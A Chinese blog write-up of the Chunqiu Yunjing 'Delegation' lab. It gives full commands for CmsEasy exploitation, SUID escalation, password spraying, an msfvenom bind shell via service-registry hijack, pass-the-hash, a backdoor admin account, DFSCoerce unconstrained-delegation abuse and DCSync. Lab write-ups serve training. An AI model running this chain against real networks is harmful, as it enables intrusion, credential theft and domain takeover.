【内网渗透】最保姆级的春秋云镜Delegation打靶笔记

于 2024-09-02 22:40:33 发布
阅读量663 收藏 4
点赞数 10
文章标签: 春秋云镜 Delegation 内网渗透 渗透 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141792817
版权

目录

flag1

flag2 

flag3 

flag4 

flag1

./fscan -h 39.101.135.65 -p 1-65535

访问web,cmseasy 

访问./admin后弱口令admin/123456登录后台

 打现成的EXP:CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞 | jdr

 连蚁剑

suid提权读flag1

find / -perm -u=s -type f 2>/dev/null
diff --line-format=%L /dev/null /home/flag/flag01.txt

 给到hint,明显是一个域用户

WIN19\Adrian

flag2 

蚁剑上传fscan和frp,扫内网,搭隧道

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7      is alive
(icmp) Target 172.22.4.36     is alive
(icmp) Target 172.22.4.19     is alive
(icmp) Target 172.22.4.45     is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.36:21 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:445 open
172.22.4.36:3306 open
172.22.4.7:88 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetInfo 
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo 
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetBios 172.22.4.45     XIAORANG\WIN19                
[*] OsInfo 172.22.4.7	(Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.7      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.45        code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.4.36        code:200 len:68100  title:中文网页标题

 结合提示WIN19\Adrian,去打172.22.4.45 ,密码喷洒得到babygirl1这个过期的密码

proxychains4 crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

可以rdp连上去改密码

proxychains4 rdesktop 172.22.4.45 -r disk:share=/home/kali/Desktop/tmp

 先输一遍原账密,再修改登录

直接读flag2没有权限

找到一个风险文件,大意是可以对 gupdate 服务的注册表项进行广泛的修改,包括更改配置、删除和创建新的配置项等。 

msfvenom -p windows/meterpreter/bind_tcp LPORT=1337 -f exe > exp.exe

用kali分享来上传文件

 修改注册表路径并启动进程

reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\exp.exe"

sc start gupdate

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 1337
exploit

ps选一个SYSTEM权限做migrate进程迁移

cat  /users/administrator/flag/flag02.txt

flag3 

hashdump

 Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::

打administrato的pth

proxychains4 python psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk

创建一个administrator权限用户

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

 再rdp连上去(方便管理员身份运行传上去的工具)

proxychains4 rdesktop 172.22.4.45 -u Z3r4y -d WIN19 -p '0x401@admin' -r disk:share=/home/kali/Desktop/tmp

msf抓一下哈希 

load kiwi
creds_all

 

查看域内委派关系 

proxychains4 python findDelegation.py xiaorang.lab/'WIN19$' -hashes :5943c35371c96f19bda7b8e67d041727 -dc-ip 172.22.4.7

存在一个非约束委派 

先让WIN19监听

C:\Users\Z3r4y\Desktop\Rubeus4.0.exe monitor /interval:1 /filteruser:DC01$ > C:\Users\Z3r4y\Desktop\hash.txt

再利用强认证漏洞强制DC访问WIN19,拿到其TGT票据 

proxychains4 python dfscoerce.py -u "WIN19$" -hashes :dd5b235421f0f6dbdb25a4c6340c5d12 -d xiaorang.lab WIN19 172.22.4.7

 

然后导入票据 

C:\Users\Z3r4y\Desktop\Rubeus4.0.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6g3j9BWWyCBtzW9N+e2YA4NHLkKKmEtGl2Rw2gvVY41joyg1+9uFfFS2WSwfaElvuPlj4Om2FIDeKt6iylall0pDNtFOiQWeITkNwV3HUJsp+aibhLEg7vSIOdCdwCzPiOR2Da56gTGl59lRUG3gSF2/39AkgjiASVb6m3nyxb1/UixFH6IKzAbVT90Y6AZxHi+I6Z9hwhOAVodcxSSzQxvl1FroQCV66qgC8BqejYtL+KHZ/EAtfZ7gii8K0cqGy70I+Fsffn+WZaE2WtJC2MweQPtixsU3pD9KraBDRQoCmiGmFTMdftaqglApUHyoAx0M30wlIboTPR5V8KKMBwfcm/Id/9WQoe7hI6NtrAk/NpYZHHvMH86a5ckQLHhiyZleEaR4gi6ylBCwF/1tUb88yfXaPHKdN6Ww2+GrcG3medDVUtF8PFOxlMWdxThjcFEnt0Q3LPb2ah4YAM8CbspgTPPRQ/PCVQTy0lllmHT2gJjUzvZFl5mYuaXxQywgv0UEwXyvbBXTy2otaGsNHozVyHY5FLA27q/wJORokp6l4A7o2d4Ndzibdr74kFFDu6E1z06UpDExyX/KEGvVOtp918Yy0Masw3zC40o7hSZDKVNmXx1UmGm6ofytW5yPZNGGfXiEIqqk9JgS1EE1Y4VmCL0VXibIcVCN8Kb4X2qDwiDlSxTV+s+w0S+IYTcphvohdrleWfNEUXViJoegBPsGjTVwbEQGNn2rVOsvOF+DSjS8Lzp+lbcDboXwjTsFGM0eOemgXap1z+M4K8XAqp40Vg8UojV/YTfODC3sxJjlQ4fX28kFewMZiIuxJauXhWYzIq7GxDGk2RXO4rw8Nqu7Z558rvvE1li8nNWJ8onf96Fd/8rWgsNbwXf6IdURaw+k0HHOlNfWQVb8gcrQKhZtm3QnvQOIBUMRM6oHxA72EVl+gFKcKxYlQfhcZ2eKecbYFJWpbcWvlGFGXLe/Ajk345TUQZA39st/wXa34e1tOWbztxZsDrHtKjgoyE9o85UI/MKRRqhBG5s/3EpzALy1+jvXesNHe6zELN8TL4bsX/IASWm2BAj3z6cKRFOBqtJCH+q9ROWAa8rH7tgl/gWt1TT/F2YIHujBK6w7sCC4Rm/410xRBxtpllfO9mNZfBscxs2li9EBu4uM56Ql6ecOpijvD4AsBZ7uTlq+PJfLlAZ7EOq10pX7Kfl5bhSnAruBise1oQRSwydivheyGs/nqo3C0PebXY4oRw+qiffZV7eGylBGYDuiN41VUJLiznGAkAgBwm5znKlnffW1Nk0DyQ81airBLVX9GfH68mHjEReOyYe82t8MRBX3fpR/WNNfBW88HOZWySRsZtmR3+20lgrFE/ZXux8S4USr9zjoSAQDRsSj4fepKFriuTLVEANMuRPpeQ2eRgtgOnWGEjMhrPJ+F8l7jocwEWFImjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCDrKLK96jdRiyRvxBM1L+fJbrGc15bGbmZnwVT9jkJeHqEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDkwMjEzMzYyNlqmERgPMjAyNDA5MDIyMzM2MjZapxEYDzIwMjQwOTA5MTMzNjI2WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

猕猴桃抓一下哈希 

lsadump::dcsync /domain:xiaorang.lab /all /csv

 

pth 

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.19 -codec gbk

 读flag3

type c:\users\Administrator\flag\flag04.txt

flag4 

proxychains4 impacket-smbexec -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab/administrator@172.22.4.7 -codec gbk
type c:\users\Administrator\flag\flag04.txt

Z3r4y
关注
红队内网攻防渗透内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 521
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
红队内网攻防渗透内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 349
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
春秋云镜-Delegation-Writeup
qq_35607078的博客
08-14 881
春秋云镜-Delegation-Writeup
春秋云镜-【仿真场景】Delegation writeup
渗透测试研究中心
03-07 681
0x1 Info靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU 从web到内网再到域的靶场环境都全,且出题的思路很好,感兴趣的可以去玩玩0x2 ReconTarget external IP39.98.34.149Nmap results关注80端口的http服务,目录爆破(省略)找到 /admin使用弱口令登录进...
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 938
一场内网渗透
春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
果粒程
12-08 1701
春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
果粒程
11-30 1358
春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP
内网渗透常用提权方式总结
j1044957016的博客
06-01 7815
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
内网渗透1
m0_55772907的博客
05-08 1524
一、信息收集 域环境? or 工作组环境? 当我们通过 Web 漏洞或者其他的⼿段获取到了⼀个命令执⾏的⼝⼦后,我们想要对当前服务器进⾏深层次的内⽹ 渗透,那么必须得知道当前机器所在的环境是工作组 还是 域 ,因为两种环境的攻击⼿法不同,所以我们需要根据 不同的环境来做不同的处理! 判断是否在域内 1、查看当前网卡和IP信息: ipconfig /all 2、查看系统详细信息: systeminfo 3、查看当前登录域及域用户 net config workstation 4、
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1414
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
WP-春秋云镜-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1493
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
春秋云境】CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
果粒程
12-03 787
春秋云境】CVE-2022-23906靶场WP和CVE-2022-23880靶场WP
春秋云境】CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境】CVE-2022-22733靶场WP
果粒程
12-07 1730
春秋云境】CVE-2022-22733靶场WP
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 CVE-2015-1427 漏洞复现
ADummy的博客
02-24 932
ElasticSearch 命令执行漏洞(CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 ​ jre版本:openjdk:8-jre ​ elasticsearc
春秋云境Initial WP
m0_62466350的博客
12-05 1336
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
春秋云镜已做题目のWP (2)
Fab1an的博客
10-16 547
既然题目说有文件上传漏洞,那我们就寻找进来之后点来点去,没发现上传点,发现左边可以登录。试一下弱口令,账号admin密码admin,成功登录进去之后的左边Users那里可以上传,直接上传一句话木马文件php?上传成功,访问我们上传的文件的位置,成功RCE,接下来可以cat /flag了s=cat /f*
内网渗透】最保姆春秋云镜Initial打靶笔记
最新发布
uuzeray的博客
08-20 1025
永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash。在打DC前先打172.22.1.21 MS17-010永恒之蓝。拿到第一个flag,提示下一个flag在内网服务器。先上传或者wget下载frpc和frpc.ini。suid没有可利用的提权命令,打sudo提权。再用crackmapexec打PTH拿下域控。172.22.1.18 信呼OA系统。先给msf所在机配一下socks5代理。这个一般直接拿kali的msf打就行。然后就能直接浏览器里访问内网服务。
Java事件处理模型:从Hierarchical到Delegation
"该资源是关于Java学习的,特别是针对事件处理模型的讲解,包括Java 1.0的Hierarchical model和1.1之后的Delegation model。此外,还涉及了Java程序设计的基础知识,如面向对象编程、图形用户界面(Swing)、多线程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值